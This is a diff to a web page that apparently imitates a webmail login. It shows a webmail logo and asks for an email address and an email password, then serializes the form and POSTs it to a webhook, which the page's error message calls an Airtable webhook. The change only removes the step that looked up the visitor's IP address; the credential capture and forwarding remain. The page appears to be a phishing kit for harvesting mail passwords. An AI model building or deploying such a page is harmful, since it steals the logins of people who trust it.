--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
   <section class="section">
     <div class="form-block w-form"><img src="images/webmail-logo.svg" loading="lazy" alt="" class="image-2">
       <form id="email-form" name="email-form" data-name="Email Form" class="form" data-wf-page-id="678fc8eb0051ef14f18f032e" data-wf-element-id="de9f6351-598d-f1f7-b608-32e0c0f916b8"><label for="email" class="field-label">Email Address</label>
-        <div class="div-block sws"><input class="text-field w-input" maxlength="256" name="email-2" data-name="Email 2" placeholder="Enter your email address." type="email" id="email-2" required=""> <input type="hidden" id="ip" name="ip"> <img src="images/icon-username.png" loading="lazy" alt="" class="image"></div><label for="email-3" class="field-label">Password</label>
+        <div class="div-block sws"><input class="text-field w-input" maxlength="256" name="email-2" data-name="Email 2" placeholder="Enter your email address." type="email" id="email-2" required=""> <img src="images/icon-username.png" loading="lazy" alt="" class="image"></div><label for="email-3" class="field-label">Password</label>
         <div class="div-block sw"><input class="text-field w-input" maxlength="256" name="pazz1" data-name="pazz1" placeholder="Enter your email password." type="password" id="pazz" required=""><img src="images/icon-password.png" loading="lazy" alt="" class="image"></div><input type="submit" data-wait="Please wait..." class="submit-button w-button" value="log in">
       </form>
       <div class="div-block-2">
@@ -48,21 +48,8 @@
   <script src="js/webflow.js" type="text/javascript"></script>
   <script>
   $(document).ready(function () {
-    // First, fetch user's IP and store it in the hidden field
-    $.getJSON("https://api64.ipify.org?format=json", function (data) {
-      $("#ip").val(data.ip); // ✅ Set the IP field before submission
-      console.log("User IP:", data.ip); // Debugging: See if IP is captured
-    });
-
     $("#email-form").submit(function (event) {
       event.preventDefault(); // Prevent default form submission
-
-      var ipValue = $("#ip").val(); // Get the IP value before submitting
-
-      if (!ipValue) {
-        alert("⚠️ Error: IP address not captured yet. Please try again.");
-        return; // Stop submission if IP is missing
-      }
 
       var formData = $(this).serialize(); // Serialize form data
 
@@ -71,7 +58,7 @@
         type: "POST",
         data: formData,
         success: function () {
-          console.log("✅ Form submitted successfully with IP:", ipValue);
+          console.log("✅ Form submitted successfully");
         },
         error: function () {
           console.warn("⚠️ Airtable Webhook doesn't return a success response.");
